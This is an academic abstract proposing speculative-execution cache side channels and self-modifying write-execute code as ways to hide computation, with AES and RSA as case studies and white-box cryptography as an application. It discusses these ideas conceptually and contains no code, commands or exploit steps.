Self-spectre, write-execute and the hidden state

Gregory Morse


The recent Meltdown and Spectre vulnerabilities have highlighted a very present and real threat in the on-chip memory cache units which can ultimately provide a hidden state, albeit only readable via memory timing instructions \cite{DBLP:journals/corr/abs-1801-01203}.  Yet the exploits although having some complexity and slowness are demonstrably reliable on nearly all processors produced for the last two decades.

Moving out from looking at this strictly as a means of reading protected memory, as the large microprocessor companies move to close this security vulnerability, an interesting question arises.  Could the inherent design of the processor give the ability to hide arbitrary calculations in this speculative and parallel side channel?  Without even using protected memory and exploiting the vulnerability, as has been the focus, there could very well be a whole class of techniques which exploit the side-channel.  It could be done in a way which would be largely unpreventable behavior as the technology would start to become self-defeating or require a more complicated and expensive on-chip cache memory system to properly post-speculatively clean itself.  And the ability to train the branch predictor to incorrectly speculatively behave is almost certain given hardware limitations, and thus provides exactly this pathway.

A novel approach looks at just how much computation can be done speculatively with a result store via indirect reads and available through the memory cache.  A multi-threaded approach can allow a multi-stage computation pipeline where each computation is passed to a read-out thread and then to the next computation thread \cite{Swanson:2003:ESI:859716.859720}.  Through channels like this, an application can surreptitiously make arbitrary calculations, or even leak data without any standard tracing tools being capable of monitoring the subtle changes.  Like a variation of the famous physics Heisenberg uncertainty principle, even a tool capable of reading the cache states would not only be incredibly inefficient, but thereby tamper with and modify the state.  Tools like in-circuit emulators, or specially designed cache emulators would be needed to unmask the speculative reads, and it is further difficult to visualize with a linear timeline.

Another approach similar to genetic programming is presented showing that when forbidding read-access to both memory and registers in code, then writing and execution is as expected \cite{Nordin95evolvingturing-complete}, enough to make arbitrary computations via the use of self-modifying code.  However, its ease of implementation and translation, along with a methodology to build a framework around it is demonstrated.  There are various techniques possible including predefined instructions with writing pathways for a chain of computation or changing instruction opcodes to category equivalents for representation of decisions.  In this case, the program itself is the state which indirectly hides its data.

Specifically, the AES and RSA algorithms will be studied with respect to these ideas, looking at success rates for various calculation batches with speculative execution, while having a summary view to see the rather severe performance penalties for using such methods.

Either approach could provide for strong white-box cryptography when considering a binary, non-source code form.  In terms of white-box methods, both could be significantly challenging to locate or deduce the inner workings of the code.  Further, both methods can easily surreptitiously leak or hide data within shared memory in a seemingly innocuous manner.

Full Text: